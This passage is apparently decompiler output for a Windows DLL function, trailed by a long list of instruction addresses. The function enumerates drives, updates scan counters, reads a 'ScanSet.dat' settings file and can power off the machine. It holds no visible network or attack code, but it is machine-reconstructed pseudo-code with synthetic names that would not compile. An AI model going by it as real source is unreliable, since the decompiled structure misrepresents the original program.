							if(_t423 != 0) {
								break;
							}
							_t390 =  *_t291;
							_t331 = _t291;
							 *(_t418 + 0x24) =  *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0xc))))() + 0x10;
							 *(_t418 + 0xf4) = 0;
							if(_t329 < 0) {
								L18:
								E1001729E(_t329, _t331, _t407, _t413, _t436);
								L19:
								_t329 = GetLogicalDriveStringsA;
								_t410 = GetLogicalDriveStringsA(0, 0);
								_t62 = _t410 + 1; // 0x1
								_t280 = E100160EC(_t436, _t62);
								_t418 = _t418 + 4;
								_t413 = _t280;
								_t281 = GetLogicalDriveStringsA(_t410, _t413);
								_t411 = _t410 + 0xffffffff;
								_t437 = _t281 - _t410 + 0xffffffff;
								if(_t281 == _t410 + 0xffffffff) {
									_t282 = _t413;
									_t63 =  &(_t282[1]); // 0x1
									_t398 = _t63;
									do {
										_t365 =  *_t282;
										_t282 =  &(_t282[1]);
										__eflags = _t365;
									} while (_t365 != 0);
									_t283 = _t282 - _t398;
									__eflags = _t283;
									_t412 = _t283;
									while(__eflags != 0) {
										 *(_t418 + 0x18) = _t418;
										E10005030(_t398, _t415, _t413);
										_t367 =  *0x1006f050; // 0x0
										E1000EC00(_t367, _t398, __eflags, _t365);
										_t413 =  &(_t413[_t412 + 1]);
										_t286 = _t413;
										_t398 =  &(_t286[1]);
										do {
											_t365 =  *_t286;
											_t286 =  &(_t286[1]);
											__eflags = _t365;
										} while (_t365 != 0);
										_t287 = _t286 - _t398;
										__eflags = _t287;
										_t412 = _t287;
									}
									L82:
									_t391 =  *0x1006f050; // 0x0
									TerminateThread(_t391[0x28c], 0);
									_t332 =  *0x1006f050; // 0x0
									SendMessageA(_t332[0x20], 0x111, 0xfff555ee, 0xf55555ee);
									E1002181C(_t329, 0, _t413, __eflags, 0x10058350, 0, 0);
									_t230 =  *0x1006f050; // 0x0
									_t230[0x10e8] = 0;
									_t333 =  *0x1006f050; // 0x0
									_t333[0x10ec] = 0;
									_t390 =  *0x1006f050; // 0x0
									 *((intOrPtr*)(_t390 + 0x10f0)) = 0;
									_t334 =  *0x1006f050; // 0x0
									E1001D2C4( &(_t334[0x4fc]), 0x10056948);
									_t336 =  *0x1006f050; // 0x0
									E1001D2C4( &(_t336[0x454]), 0x10056948);
									_t338 =  *0x1006f050; // 0x0
									E1001D39A( &(_t338[0x4a8]), 1);
									_t340 =  *0x1006f050; // 0x0
									E1001D2C4( &(_t340[0x304]), 0x10056948);
									_t342 =  *0x1006f050; // 0x0
									E1001D39A( &(_t342[0x400]), 0);
									_t344 =  *0x1006f050; // 0x0
									E1001D39A( &(_t344[0x3ac]), 0);
									E100205E2(_t418 + 0x70, __eflags);
									_push(0);
									_push(0x40);
									_push("Setting\\ScanSet.dat");
									 *((intOrPtr*)(_t418 + 0x100)) = 6;
									__eflags = E10020A24(_t418 + 0x7c, _t390, __eflags);
									if(__eflags != 0) {
										_t242 =  *((intOrPtr*)(_t418 + 0x70));
										_t393 =  *((intOrPtr*)(_t242 + 0x28));
										 *((intOrPtr*)( *((intOrPtr*)(_t242 + 0x28))))(0, 0, 0);
										_push(0);
										_push(0x1000);
										_push(1);
										_push(_t418 + 0x7c);
										E10020058(_t329, _t418 + 0x38,  *((intOrPtr*)(_t242 + 0x28)), 0, _t413, __eflags);
										__eflags =  *(_t418 + 0x40) & 0x00000001;
										 *(_t418 + 0xf4) = 7;
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t418 + 0x3c)));
											_push(4);
											E10020287(_t329, _t393, 0, _t413, __eflags);
										}
										_t246 =  *(_t418 + 0x50);
										_t355 =  *((intOrPtr*)(_t418 + 0x54));
										_t394 =  &(_t246[1]);
										__eflags =  &(_t246[1]) - _t355;
										if( &(_t246[1]) > _t355) {
											__eflags = _t246 - _t355 + 4;
											E1001FADC(_t418 + 0x2c, _t394, _t246 - _t355 + 4);
											_t355 =  *((intOrPtr*)(_t418 + 0x54));
											_t246 =  *(_t418 + 0x50);
										}
										_t247 =  &(_t246[1]);
										__eflags =  *(_t418 + 0x40) & 0x00000001;
										 *(_t418 + 0x50) = _t247;
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t418 + 0x3c)));
											_push(4);
											_t247 = E10020287(_t329, _t394, 0, _t413, __eflags);
										}
										_t179 =  &(_t247[1]); // 0x4
										_t395 = _t179;
										__eflags = _t179 - _t355;
										if(_t179 > _t355) {
											__eflags = _t247 - _t355 + 4;
											E1001FADC(_t418 + 0x2c, _t395, _t247 - _t355 + 4);
											_t355 =  *((intOrPtr*)(_t418 + 0x54));
											_t247 =  *(_t418 + 0x50);
										}
										_t248 =  &(_t247[1]);
										__eflags =  *(_t418 + 0x40) & 0x00000001;
										 *(_t418 + 0x50) = _t248;
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t418 + 0x3c)));
											_push(4);
											_t248 = E10020287(_t329, _t395, 0, _t413, __eflags);
										}
										_t188 =  &(_t248[1]); // 0x4
										_t396 = _t188;
										__eflags = _t188 - _t355;
										if(_t188 > _t355) {
											__eflags = _t248 - _t355 + 4;
											E1001FADC(_t418 + 0x2c, _t396, _t248 - _t355 + 4);
											_t355 =  *((intOrPtr*)(_t418 + 0x54));
											_t248 =  *(_t418 + 0x50);
										}
										_t249 =  &(_t248[1]);
										__eflags =  *(_t418 + 0x40) & 0x00000001;
										 *(_t418 + 0x50) = _t249;
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t418 + 0x3c)));
											_push(4);
											_t249 = E10020287(_t329, _t396, 0, _t413, __eflags);
										}
										_t197 =  &(_t249[1]); // 0x4
										_t397 = _t197;
										__eflags = _t197 - _t355;
										if(_t197 > _t355) {
											__eflags = _t249 - _t355 + 4;
											E1001FADC(_t418 + 0x2c, _t397, _t249 - _t355 + 4);
											_t355 =  *((intOrPtr*)(_t418 + 0x54));
											_t249 =  *(_t418 + 0x50);
										}
										_t250 =  &(_t249[1]);
										__eflags =  *(_t418 + 0x40) & 0x00000001;
										 *(_t418 + 0x50) = _t250;
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t418 + 0x3c)));
											_push(4);
											_t250 = E10020287(_t329, _t397, 0, _t413, __eflags);
										}
										_t206 =  &(_t250[1]); // 0x4
										_t390 = _t206;
										__eflags = _t206 - _t355;
										if(__eflags > 0) {
											__eflags = _t250 - _t355 + 4;
											E1001FADC(_t418 + 0x2c, _t390, _t250 - _t355 + 4);
											_t250 =  *(_t418 + 0x50);
										}
										_t413 =  *_t250;
										 *(_t418 + 0x50) =  &(_t250[1]);
										E1001FEB3(_t418 + 0x28, __eflags);
										E10020580(_t329, _t418 + 0x70);
										__eflags =  *_t250;
										if(__eflags == 0) {
											ExitWindowsEx(8, 0);
										}
										 *(_t418 + 0xf4) = 6;
										E1002001A(_t329, _t418 + 0x28, _t390, 0, _t413, __eflags);
									}
									 *(_t418 + 0xf4) = 0xffffffff;
									E100206EF(_t329, _t418 + 0x70, _t390, 0, _t413, __eflags);
								} else {
									L20:
									E1002181C(_t329, _t411, _t413, _t437, 0x100587a4, 0, 0);
								}
							} else {
								_t331 =  *(_t418 + 0x20);
								_t426 = _t329 -  *((intOrPtr*)(_t331 + 8));
								if(_t329 >=  *((intOrPtr*)(_t331 + 8))) {
									goto L18;
								} else {
									_push( *((intOrPtr*)(_t331 + 4)) + _t329 * 4);
									E10001FF0(_t418 + 0x28);
									_t370 =  *0x1006f050; // 0x0
									_t413 =  *(_t418 + 0x24);
									_t371 =  &(_t370[0x4fc]);
									E1001D2C4(_t371, _t413);
									_push(_t371);
									_t415 = _t413 - 0x10;
									 *(_t418 + 0x20) = _t418;
									_t407 = _t418;
									_t299 = E10001080(_t329, _t415);
									_t420 = _t418 + 4;
									 *_t418 = _t299 + 0x10;
									_t373 =  *0x1006f050; // 0x0
									E1000E6F0(_t373, _t331, _t426, _t420 + 0x1c);
									_t390 =  *(_t420 + 0x18);
									 *((char*)(_t420 + 0xfc)) = 1;
									_t302 = E1003BD06( *(_t420 + 0x18), 0x10056948);
									_t418 = _t420 + 8;
									if((_t302 & 0xffffff00 | _t302 != 0x00000000) != 0) {
										_t322 =  *0x1006f050; // 0x0
										_t27 =  &(_t322[0x358]); // 0x358
										E10026562(_t27, 1, _t322[0x10ec], 0x10056948, 0, 0, 0, 0);
										_t324 =  *0x1006f050; // 0x0
										_t29 =  &(_t324[0x358]); // 0x358
										E1002637C(_t29, _t324[0x10ec], 0, _t413);
										_t390 =  *(_t418 + 0x18);
										_t326 =  *0x1006f050; // 0x0
										_t32 =  &(_t326[0x358]); // 0x358
										E1002637C(_t32, _t326[0x10ec], 1,  *(_t418 + 0x18));
										_t328 =  *0x1006f050; // 0x0
										_t328[0x10ec] = _t328[0x10ec] + 1;
									}
									_t304 =  *0x1006f050; // 0x0
									_t304[0x10e8] = _t304[0x10e8] + 1;
									_t305 = E100173A6();
									_t430 = _t305;
									_t331 = 0 | _t430 != 0x00000000;
									if(_t430 != 0) {
										break;
									} else {
										 *((intOrPtr*)(_t418 + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *_t305 + 0xc))))() + 0x10;
										_t309 =  *0x1006f050; // 0x0
										_push(_t309[0x10f0]);
										_push(_t309[0x10ec]);
										 *((char*)(_t418 + 0x108)) = 2;
										E10003500(_t418 + 0x28, 0x1005873c, _t309[0x10e8]);
										_t378 =  *0x1006f050; // 0x0
										_t413 =  *(_t418 + 0x30);
										_t418 = _t418 + 0x14;
										_t379 =  &(_t378[0x304]);
										E1001D2C4(_t379, _t413);
										_t313 = _t413 - 0x10;
										 *(_t418 + 0xf4) = 1;
										_t402 =  &(_t313[3]);
										asm("lock xadd [edx], ecx");
										if((_t379 | 0xffffffff) - 1 <= 0) {
											_t402 =  *( *_t313);
											 *((intOrPtr*)( *((intOrPtr*)(_t402 + 4))))(_t313);
										}
										_t315 =  *(_t418 + 0x18) + 0xfffffff0;
										 *(_t418 + 0xf4) = 0;
										asm("lock xadd [ecx], edx");
										_t404 = (_t402 | 0xffffffff) - 1;
										if(_t404 <= 0) {
											_t404 =  *( *_t315);
											 *((intOrPtr*)( *((intOrPtr*)(_t404 + 4))))(_t315);
										}
										 *(_t418 + 0xf4) = 0xffffffff;
										_t331 =  &(_t415[3]);
										asm("lock xadd [ecx], edx");
										_t390 = (_t404 | 0xffffffff) - 1;
										if((_t404 | 0xffffffff) - 1 <= 0) {
											_t331 =  *_t415;
											_t316 =  *( *_t415);
											_t390 =  *(_t316 + 4);
											 *( *(_t316 + 4))(_t415);
										}
										_t329 = _t329 + 1;
										if(_t329 <  *(_t418 + 0x14)) {
											continue;
										} else {
											goto L15;
										}
									}
								}
							}
							goto L107;
						}
						L17:
						E10001000(_t331, _t390, 0x80004005);
						goto L18;
					}
				}
				L107:
				 *[fs:0x0] =  *((intOrPtr*)(_t418 + 0xec));
				_pop(_t409);
				_pop(_t414);
				_pop(_t330);
				return E1003B437(0, _t330,  *(_t418 + 0xd4) ^ _t418, _t390, _t409, _t414);
			}





































































                                                                                                                0x1000f3a0
                                                                                                                0x1000f3a2
                                                                                                                0x1000f3ad
                                                                                                                0x1000f3ae
                                                                                                                0x1000f3b4
                                                                                                                0x1000f3bb
                                                                                                                0x1000f3c2
                                                                                                                0x1000f3c3
                                                                                                                0x1000f3c4
                                                                                                                0x1000f3c5
                                                                                                                0x1000f3c6
                                                                                                                0x1000f3cd
                                                                                                                0x1000f3d5
                                                                                                                0x1000f3db
                                                                                                                0x1000f3e1
                                                                                                                0x1000f3e8
                                                                                                                0x1000f621
                                                                                                                0x1000f621
                                                                                                                0x1000f628
                                                                                                                0x1000f62b
                                                                                                                0x1000fb5a
                                                                                                                0x00000000
                                                                                                                0x1000f631
                                                                                                                0x1000f631
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f6d5
                                                                                                                0x1000f6d6
                                                                                                                0x1000f6d8
                                                                                                                0x1000f6dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f6f6
                                                                                                                0x1000f702
                                                                                                                0x1000f704
                                                                                                                0x1000f704
                                                                                                                0x1000f710
                                                                                                                0x1000f714
                                                                                                                0x1000f716
                                                                                                                0x1000f719
                                                                                                                0x1000f71b
                                                                                                                0x00000000
                                                                                                                0x1000f721
                                                                                                                0x1000f721
                                                                                                                0x1000f723
                                                                                                                0x1000f723
                                                                                                                0x1000f726
                                                                                                                0x1000f726
                                                                                                                0x1000f728
                                                                                                                0x1000f72b
                                                                                                                0x1000f72b
                                                                                                                0x1000f72f
                                                                                                                0x1000f72f
                                                                                                                0x1000f731
                                                                                                                0x1000f733
                                                                                                                0x1000f739
                                                                                                                0x1000f740
                                                                                                                0x1000f741
                                                                                                                0x1000f743
                                                                                                                0x1000f746
                                                                                                                0x1000f749
                                                                                                                0x1000f74b
                                                                                                                0x1000f750
                                                                                                                0x1000f755
                                                                                                                0x1000f75b
                                                                                                                0x1000f75b
                                                                                                                0x1000f760
                                                                                                                0x1000f764
                                                                                                                0x1000f766
                                                                                                                0x1000f770
                                                                                                                0x1000f770
                                                                                                                0x1000f772
                                                                                                                0x1000f775
                                                                                                                0x1000f775
                                                                                                                0x1000f779
                                                                                                                0x1000f779
                                                                                                                0x1000f77b
                                                                                                                0x1000f77b
                                                                                                                0x1000f77f
                                                                                                                0x00000000
                                                                                                                0x1000f733
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f784
                                                                                                                0x1000f78a
                                                                                                                0x1000f78f
                                                                                                                0x1000f793
                                                                                                                0x1000f796
                                                                                                                0x1000f798
                                                                                                                0x1000f79a
                                                                                                                0x1000f79e
                                                                                                                0x00000000
                                                                                                                0x1000f7a4
                                                                                                                0x1000f7a4
                                                                                                                0x1000f7a4
                                                                                                                0x1000f7a9
                                                                                                                0x1000f7ab
                                                                                                                0x1000f7ad
                                                                                                                0x1000f7b0
                                                                                                                0x1000f7b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f7b8
                                                                                                                0x1000f7ba
                                                                                                                0x1000f7bf
                                                                                                                0x1000f7c1
                                                                                                                0x1000f7c4
                                                                                                                0x1000f7c8
                                                                                                                0x1000f7ca
                                                                                                                0x1000f7d5
                                                                                                                0x00000000
                                                                                                                0x1000f7db
                                                                                                                0x1000f7db
                                                                                                                0x1000f7df
                                                                                                                0x1000f7e2
                                                                                                                0x00000000
                                                                                                                0x1000f7e8
                                                                                                                0x1000f7e8
                                                                                                                0x1000f7ed
                                                                                                                0x1000f7f0
                                                                                                                0x1000f7f1
                                                                                                                0x1000f7f5
                                                                                                                0x1000f7fa
                                                                                                                0x1000f800
                                                                                                                0x1000f805
                                                                                                                0x1000f80b
                                                                                                                0x1000f810
                                                                                                                0x1000f811
                                                                                                                0x1000f814
                                                                                                                0x1000f818
                                                                                                                0x1000f81b
                                                                                                                0x1000f820
                                                                                                                0x1000f823
                                                                                                                0x1000f826
                                                                                                                0x1000f82a
                                                                                                                0x1000f82d
                                                                                                                0x1000f833
                                                                                                                0x1000f838
                                                                                                                0x1000f842
                                                                                                                0x1000f84a
                                                                                                                0x1000f852
                                                                                                                0x1000f854
                                                                                                                0x1000f857
                                                                                                                0x1000f859
                                                                                                                0x1000f85b
                                                                                                                0x1000f860
                                                                                                                0x1000f874
                                                                                                                0x1000f874
                                                                                                                0x1000f87c
                                                                                                                0x1000f881
                                                                                                                0x1000f886
                                                                                                                0x1000f890
                                                                                                                0x1000f890
                                                                                                                0x1000f896
                                                                                                                0x1000f89b
                                                                                                                0x1000f89f
                                                                                                                0x1000f8a4
                                                                                                                0x1000f8ae
                                                                                                                0x1000f8ae
                                                                                                                0x1000f8b4
                                                                                                                0x1000f8b9
                                                                                                                0x1000f8be
                                                                                                                0x1000f8be
                                                                                                                0x1000f8be
                                                                                                                0x1000f8be
                                                                                                                0x1000f8c5
                                                                                                                0x1000f8ca
                                                                                                                0x1000f8d1
                                                                                                                0x1000f8d6
                                                                                                                0x1000f8d8
                                                                                                                0x1000f8da
                                                                                                                0x1000f8dd
                                                                                                                0x1000f8df
                                                                                                                0x00000000
                                                                                                                0x1000f8e5
                                                                                                                0x1000f8e5
                                                                                                                0x1000f8e7
                                                                                                                0x1000f8ec
                                                                                                                0x1000f8ee
                                                                                                                0x1000f8f1
                                                                                                                0x1000f8f5
                                                                                                                0x1000f8fa
                                                                                                                0x1000f900
                                                                                                                0x1000f906
                                                                                                                0x1000f90c
                                                                                                                0x1000f90d
                                                                                                                0x1000f90f
                                                                                                                0x1000f919
                                                                                                                0x1000f921
                                                                                                                0x1000f926
                                                                                                                0x1000f92c
                                                                                                                0x1000f934
                                                                                                                0x1000f93a
                                                                                                                0x1000f93f
                                                                                                                0x1000f942
                                                                                                                0x1000f94a
                                                                                                                0x1000f94d
                                                                                                                0x1000f950
                                                                                                                0x1000f954
                                                                                                                0x1000f955
                                                                                                                0x1000f957
                                                                                                                0x1000f959
                                                                                                                0x1000f95b
                                                                                                                0x1000f95d
                                                                                                                0x1000f961
                                                                                                                0x1000f961
                                                                                                                0x1000f963
                                                                                                                0x1000f967
                                                                                                                0x1000f96a
                                                                                                                0x1000f972
                                                                                                                0x1000f975
                                                                                                                0x1000f978
                                                                                                                0x1000f97c
                                                                                                                0x1000f97d
                                                                                                                0x1000f97f
                                                                                                                0x1000f981
                                                                                                                0x1000f983
                                                                                                                0x1000f985
                                                                                                                0x1000f989
                                                                                                                0x1000f989
                                                                                                                0x1000f98b
                                                                                                                0x1000f996
                                                                                                                0x1000f999
                                                                                                                0x1000f99c
                                                                                                                0x1000f9a0
                                                                                                                0x1000f9a1
                                                                                                                0x1000f9a3
                                                                                                                0x1000f9a5
                                                                                                                0x1000f9a8
                                                                                                                0x1000f9aa
                                                                                                                0x1000f9ad
                                                                                                                0x1000f9ae
                                                                                                                0x1000f9ae
                                                                                                                0x1000f9b0
                                                                                                                0x1000f9b3
                                                                                                                0x1000f9b7
                                                                                                                0x00000000
                                                                                                                0x1000f9bd
                                                                                                                0x00000000
                                                                                                                0x1000f9bd
                                                                                                                0x1000f9b7
                                                                                                                0x1000f8df
                                                                                                                0x1000f7e2
                                                                                                                0x00000000
                                                                                                                0x1000f7d5
                                                                                                                0x00000000
                                                                                                                0x1000f7a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f9cc
                                                                                                                0x1000f9d4
                                                                                                                0x1000f9dc
                                                                                                                0x1000f9e3
                                                                                                                0x1000f9ea
                                                                                                                0x1000f9ec
                                                                                                                0x1000f9f1
                                                                                                                0x1000f9f6
                                                                                                                0x1000fa01
                                                                                                                0x1000fa09
                                                                                                                0x1000fa19
                                                                                                                0x1000fa1b
                                                                                                                0x1000fa21
                                                                                                                0x1000fa22
                                                                                                                0x1000fa29
                                                                                                                0x1000fa2b
                                                                                                                0x1000fa2f
                                                                                                                0x1000f6e1
                                                                                                                0x1000f6e1
                                                                                                                0x1000f6e6
                                                                                                                0x1000f6ec
                                                                                                                0x1000f6ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000fa35
                                                                                                                0x1000fa41
                                                                                                                0x1000fa43
                                                                                                                0x1000fa43
                                                                                                                0x1000fa4f
                                                                                                                0x1000fa53
                                                                                                                0x1000fa55
                                                                                                                0x1000fa58
                                                                                                                0x1000fa5a
                                                                                                                0x00000000
                                                                                                                0x1000fa60
                                                                                                                0x1000fa60
                                                                                                                0x1000fa62
                                                                                                                0x1000fa62
                                                                                                                0x1000fa65
                                                                                                                0x1000fa65
                                                                                                                0x1000fa67
                                                                                                                0x1000fa6a
                                                                                                                0x1000fa6a
                                                                                                                0x1000fa6e
                                                                                                                0x1000fa6e
                                                                                                                0x1000fa70
                                                                                                                0x1000fa72
                                                                                                                0x1000fa78
                                                                                                                0x1000fa80
                                                                                                                0x1000fa81
                                                                                                                0x1000fa83
                                                                                                                0x1000fa86
                                                                                                                0x1000fa89
                                                                                                                0x1000fa8b
                                                                                                                0x1000fa90
                                                                                                                0x1000fa95
                                                                                                                0x1000fa9b
                                                                                                                0x1000fa9b
                                                                                                                0x1000faa0
                                                                                                                0x1000faa4
                                                                                                                0x1000faa6
                                                                                                                0x1000fab0
                                                                                                                0x1000fab0
                                                                                                                0x1000fab2
                                                                                                                0x1000fab5
                                                                                                                0x1000fab5
                                                                                                                0x1000fab9
                                                                                                                0x1000fab9
                                                                                                                0x1000fabb
                                                                                                                0x1000fabb
                                                                                                                0x1000fabf
                                                                                                                0x00000000
                                                                                                                0x1000fa72
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000fac4
                                                                                                                0x1000fad0
                                                                                                                0x1000fad2
                                                                                                                0x1000fad2
                                                                                                                0x1000fade
                                                                                                                0x1000fae2
                                                                                                                0x1000fae4
                                                                                                                0x1000fae7
                                                                                                                0x1000fae9
                                                                                                                0x00000000
                                                                                                                0x1000faef
                                                                                                                0x1000faef
                                                                                                                0x1000faf1
                                                                                                                0x1000faf1
                                                                                                                0x1000faf4
                                                                                                                0x1000faf4
                                                                                                                0x1000faf6
                                                                                                                0x1000faf9
                                                                                                                0x1000faf9
                                                                                                                0x1000fafd
                                                                                                                0x1000fafd
                                                                                                                0x1000faff
                                                                                                                0x1000fb01
                                                                                                                0x1000fb03
                                                                                                                0x1000fb10
                                                                                                                0x1000fb11
                                                                                                                0x1000fb13
                                                                                                                0x1000fb16
                                                                                                                0x1000fb19
                                                                                                                0x1000fb1b
                                                                                                                0x1000fb20
                                                                                                                0x1000fb25
                                                                                                                0x1000fb2b
                                                                                                                0x1000fb2b
                                                                                                                0x1000fb30
                                                                                                                0x1000fb34
                                                                                                                0x1000fb36
                                                                                                                0x1000fb40
                                                                                                                0x1000fb40
                                                                                                                0x1000fb42
                                                                                                                0x1000fb45
                                                                                                                0x1000fb45
                                                                                                                0x1000fb49
                                                                                                                0x1000fb49
                                                                                                                0x1000fb4b
                                                                                                                0x1000fb4b
                                                                                                                0x1000fb4f
                                                                                                                0x00000000
                                                                                                                0x1000fb01
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f631
                                                                                                                0x1000f3ee
                                                                                                                0x1000f3ee
                                                                                                                0x1000f3f3
                                                                                                                0x1000f3f7
                                                                                                                0x1000f3fa
                                                                                                                0x1000f3fe
                                                                                                                0x1000f402
                                                                                                                0x00000000
                                                                                                                0x1000f408
                                                                                                                0x1000f408
                                                                                                                0x1000f408
                                                                                                                0x1000f40f
                                                                                                                0x1000f411
                                                                                                                0x1000f416
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f41c
                                                                                                                0x1000f41e
                                                                                                                0x1000f428
                                                                                                                0x1000f42e
                                                                                                                0x1000f439
                                                                                                                0x1000f642
                                                                                                                0x1000f642
                                                                                                                0x1000f647
                                                                                                                0x1000f647
                                                                                                                0x1000f653
                                                                                                                0x1000f655
                                                                                                                0x1000f659
                                                                                                                0x1000f65e
                                                                                                                0x1000f661
                                                                                                                0x1000f665
                                                                                                                0x1000f667
                                                                                                                0x1000f66a
                                                                                                                0x1000f66c
                                                                                                                0x1000f681
                                                                                                                0x1000f683
                                                                                                                0x1000f683
                                                                                                                0x1000f686
                                                                                                                0x1000f686
                                                                                                                0x1000f688
                                                                                                                0x1000f68b
                                                                                                                0x1000f68b
                                                                                                                0x1000f68f
                                                                                                                0x1000f68f
                                                                                                                0x1000f691
                                                                                                                0x1000f693
                                                                                                                0x1000f6a3
                                                                                                                0x1000f6a8
                                                                                                                0x1000f6ad
                                                                                                                0x1000f6b3
                                                                                                                0x1000f6b8
                                                                                                                0x1000f6bc
                                                                                                                0x1000f6be
                                                                                                                0x1000f6c1
                                                                                                                0x1000f6c1
                                                                                                                0x1000f6c3
                                                                                                                0x1000f6c6
                                                                                                                0x1000f6c6
                                                                                                                0x1000f6ca
                                                                                                                0x1000f6ca
                                                                                                                0x1000f6cc
                                                                                                                0x1000f6cc
                                                                                                                0x1000fb5f
                                                                                                                0x1000fb5f
                                                                                                                0x1000fb6f
                                                                                                                0x1000fb75
                                                                                                                0x1000fb8e
                                                                                                                0x1000fb9b
                                                                                                                0x1000fba0
                                                                                                                0x1000fba5
                                                                                                                0x1000fbab
                                                                                                                0x1000fbb1
                                                                                                                0x1000fbb7
                                                                                                                0x1000fbbd
                                                                                                                0x1000fbc3
                                                                                                                0x1000fbd4
                                                                                                                0x1000fbd9
                                                                                                                0x1000fbea
                                                                                                                0x1000fbef
                                                                                                                0x1000fbfd
                                                                                                                0x1000fc02
                                                                                                                0x1000fc13
                                                                                                                0x1000fc18
                                                                                                                0x1000fc25
                                                                                                                0x1000fc2a
                                                                                                                0x1000fc37
                                                                                                                0x1000fc40
                                                                                                                0x1000fc45
                                                                                                                0x1000fc46
                                                                                                                0x1000fc48
                                                                                                                0x1000fc51
                                                                                                                0x1000fc61
                                                                                                                0x1000fc63
                                                                                                                0x1000fc69
                                                                                                                0x1000fc6d
                                                                                                                0x1000fc77
                                                                                                                0x1000fc79
                                                                                                                0x1000fc7a
                                                                                                                0x1000fc7f
                                                                                                                0x1000fc85
                                                                                                                0x1000fc8a
                                                                                                                0x1000fc8f
                                                                                                                0x1000fc94
                                                                                                                0x1000fc9c
                                                                                                                0x1000fca2
                                                                                                                0x1000fca3
                                                                                                                0x1000fca5
                                                                                                                0x1000fca5
                                                                                                                0x1000fcaa
                                                                                                                0x1000fcae
                                                                                                                0x1000fcb2
                                                                                                                0x1000fcb5
                                                                                                                0x1000fcb7
                                                                                                                0x1000fcbb
                                                                                                                0x1000fcc3
                                                                                                                0x1000fcc8
                                                                                                                0x1000fccc
                                                                                                                0x1000fccc
                                                                                                                0x1000fcd0
                                                                                                                0x1000fcd3
                                                                                                                0x1000fcd8
                                                                                                                0x1000fcdc
                                                                                                                0x1000fce2
                                                                                                                0x1000fce3
                                                                                                                0x1000fce5
                                                                                                                0x1000fce5
                                                                                                                0x1000fcea
                                                                                                                0x1000fcea
                                                                                                                0x1000fced
                                                                                                                0x1000fcef
                                                                                                                0x1000fcf3
                                                                                                                0x1000fcfb
                                                                                                                0x1000fd00
                                                                                                                0x1000fd04
                                                                                                                0x1000fd04
                                                                                                                0x1000fd08
                                                                                                                0x1000fd0b
                                                                                                                0x1000fd10
                                                                                                                0x1000fd14
                                                                                                                0x1000fd1a
                                                                                                                0x1000fd1b
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd22
                                                                                                                0x1000fd22
                                                                                                                0x1000fd25
                                                                                                                0x1000fd27
                                                                                                                0x1000fd2b
                                                                                                                0x1000fd33
                                                                                                                0x1000fd38
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd40
                                                                                                                0x1000fd43
                                                                                                                0x1000fd48
                                                                                                                0x1000fd4c
                                                                                                                0x1000fd52
                                                                                                                0x1000fd53
                                                                                                                0x1000fd55
                                                                                                                0x1000fd55
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5d
                                                                                                                0x1000fd5f
                                                                                                                0x1000fd63
                                                                                                                0x1000fd6b
                                                                                                                0x1000fd70
                                                                                                                0x1000fd74
                                                                                                                0x1000fd74
                                                                                                                0x1000fd78
                                                                                                                0x1000fd7b
                                                                                                                0x1000fd80
                                                                                                                0x1000fd84
                                                                                                                0x1000fd8a
                                                                                                                0x1000fd8b
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd92
                                                                                                                0x1000fd92
                                                                                                                0x1000fd95
                                                                                                                0x1000fd97
                                                                                                                0x1000fd9b
                                                                                                                0x1000fda3
                                                                                                                0x1000fda8
                                                                                                                0x1000fda8
                                                                                                                0x1000fdac
                                                                                                                0x1000fdb5
                                                                                                                0x1000fdb9
                                                                                                                0x1000fdc2
                                                                                                                0x1000fdc7
                                                                                                                0x1000fdc9
                                                                                                                0x1000fdce
                                                                                                                0x1000fdce
                                                                                                                0x1000fdd8
                                                                                                                0x1000fde0
                                                                                                                0x1000fde0
                                                                                                                0x1000fde9
                                                                                                                0x1000fdf4
                                                                                                                0x1000f66e
                                                                                                                0x1000f66e
                                                                                                                0x1000f677
                                                                                                                0x1000f677
                                                                                                                0x1000f43f
                                                                                                                0x1000f43f
                                                                                                                0x1000f443
                                                                                                                0x1000f446
                                                                                                                0x00000000
                                                                                                                0x1000f44c
                                                                                                                0x1000f454
                                                                                                                0x1000f459
                                                                                                                0x1000f45e
                                                                                                                0x1000f464
                                                                                                                0x1000f469
                                                                                                                0x1000f46f
                                                                                                                0x1000f474
                                                                                                                0x1000f475
                                                                                                                0x1000f478
                                                                                                                0x1000f47c
                                                                                                                0x1000f47f
                                                                                                                0x1000f484
                                                                                                                0x1000f48e
                                                                                                                0x1000f491
                                                                                                                0x1000f497
                                                                                                                0x1000f49c
                                                                                                                0x1000f4a6
                                                                                                                0x1000f4ae
                                                                                                                0x1000f4b3
                                                                                                                0x1000f4bd
                                                                                                                0x1000f4bf
                                                                                                                0x1000f4d8
                                                                                                                0x1000f4e0
                                                                                                                0x1000f4e5
                                                                                                                0x1000f4f4
                                                                                                                0x1000f4fa
                                                                                                                0x1000f4ff
                                                                                                                0x1000f503
                                                                                                                0x1000f512
                                                                                                                0x1000f518
                                                                                                                0x1000f51d
                                                                                                                0x1000f522
                                                                                                                0x1000f522
                                                                                                                0x1000f529
                                                                                                                0x1000f52e
                                                                                                                0x1000f535
                                                                                                                0x1000f53c
                                                                                                                0x1000f53e
                                                                                                                0x1000f543
                                                                                                                0x00000000
                                                                                                                0x1000f549
                                                                                                                0x1000f555
                                                                                                                0x1000f559
                                                                                                                0x1000f570
                                                                                                                0x1000f571
                                                                                                                0x1000f57d
                                                                                                                0x1000f585
